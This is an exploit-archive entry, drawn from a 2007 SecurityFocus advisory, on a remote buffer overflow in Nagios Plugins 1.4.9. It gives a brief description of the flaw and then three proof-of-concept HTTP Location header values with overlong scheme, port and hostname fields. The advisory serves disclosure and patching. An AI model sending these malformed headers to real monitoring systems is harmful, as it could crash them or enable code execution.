Nagios Plugins 1.4.21.4.9 - Location Header Remote Buffer Overflow

2007-07-16T00:00:00
ID EXPLOITPACK:C1A930A68A61D6F6DA81AF980ADE133F
Type exploitpack
Reporter Nobuhiro Ban
Modified 2007-07-16T00:00:00

Description

Nagios Plugins 1.4.21.4.9 - Location Header Remote Buffer Overflow

                                        
                                            source: https://www.securityfocus.com/bid/25952/info

Nagios Plugins are prone to a remote buffer-overflow vulnerability because the software fails to properly bounds-check user-supplied data before copying it to an insufficiently sized buffer.

Exploiting this issue allows attackers to execute arbitrary machine code in the context of users running the affected software.

This issue affects Nagios Plugins 1.4.9; other versions may also be vulnerable. 

Location: htttttttttttttttttttttttttttttttttttttttttttp://example.com/

Location: http://example.com:1234567890123456789012345678901234567890/

Location:
http://tooooooooooooooooooooooooooooooooooooooooooooooooooo.loooooooooooooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.looooooooo
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.loooo
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.
loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oong.looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
ooooooong.loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
oooooooooooong.host-name.example.com/